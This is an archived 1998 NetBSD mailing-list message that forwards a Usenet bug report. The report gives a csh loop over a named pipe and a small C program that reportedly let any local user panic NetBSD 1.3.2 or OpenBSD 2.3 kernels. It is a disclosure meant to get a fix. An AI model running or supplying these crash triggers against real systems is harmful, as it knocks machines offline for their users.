current-users: NetBSD instant death (1.3.2)

Subject: NetBSD instant death (1.3.2)
To: None <current-users@netbsd.org>
From: Erik Rungi <blackbox@openface.ca>
List: current-users
Date: 11/19/1998 14:35:13
I apologize if this has been posted already but I thought it was fairly
important...=20

It would seem that anybody can panic a NetBSD-1.3 machine simply by running
the shell script listed below.  The news posting says it affects 1.3.2... I
can confirm that it toasted one of my i386 1.3 machines very efficiently.

I haven't tried the C program listed below.

EJR

From=20p99dreyf@criens.u-psud.fr Thu Nov 19 12:50:49 EST 1998
Article: 7322 of comp.unix.bsd.netbsd.misc
Path: news.openface.ca!News.Ottawa.iSTAR.net!News.Toronto.iSTAR.net!news.is=
tar.net!newsfeed.sovam.com!sovam!news.maxwell.syr.edu!oleane!jussieu.fr!u-p=
sud.fr!news.int-evry.fr!p99dreyf
From: p99dreyf@criens.u-psud.fr (Emmanuel Dreyfus)
Newsgroups: comp.unix.bsd.freebsd.misc,comp.unix.bsd.openbsd.misc,comp.unix=
=2Ebsd.netbsd.misc
Subject: Re: *BSD code sharing
Date: Thu, 19 Nov 1998 07:57:33 +0100
Organization: Institut National des Telecommunications
Lines: 40
Message-ID: <1diqdps.oehd2q12i6pezN@mimosa.hcpnet.net>
References: <72thpa$3ei@viper.cs.unm.edu> <cyap97zx5.fsf@zeus.theos.com>
NNTP-Posting-Host: gizmo.maisel.int-evry.fr
 GMT)
NNTP-Posting-Date: 19 Nov 1998 06:57:57 GMT
Xref: news.openface.ca comp.unix.bsd.freebsd.misc:53161 comp.unix.bsd.netbs=
d.misc:7322

Theo de Raadt <deraadt@zeus.theos.com> wrote:

Hello

I got a kernel bug that crash both NetBSD-1.3.2 and OpenBSD-2.3 on a
mac68k. I think you could be be interested... One of my users reported
it to me, and I see no patch availlable to fix it (Except maybe giving
/sbin/nologin shell to all my users, so that nobody could trigger it)

#!/bin/csh
set path =3D ( /usr/bin /usr/sbin /bin /sbin )
unlimit
cd /tmp
if ( -e fifo ) then
rm fifo
endif
mkfifo fifo
while ( 1 )
cat fifo >& /dev/null &
end

And that one, which crashed OpenBSD but not NetBSD, still on a mac68k:
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <err.h>
int
main(int argc, char **argv)
{
int fd;
fd =3D open("/dev/sd0a", -1, 0);
if (fd < 0)
err(1, "open");
}

--=20
Emmanuel Dreyfus.
"Le 80x86 n'est pas si complexe - il n'a simplement pas de sens"
(Mike Johnson, responsable de la conception x86 chez AMD)=20
p99dreyf@criens.u-psud.fr

--
Openface Internet Inc.                                          Erik Rungi
Montreal, Canada                                        rungus@openface.ca
(514) 281-8585                                          Technical Director
Web Services, Software Development                            OpenFace INC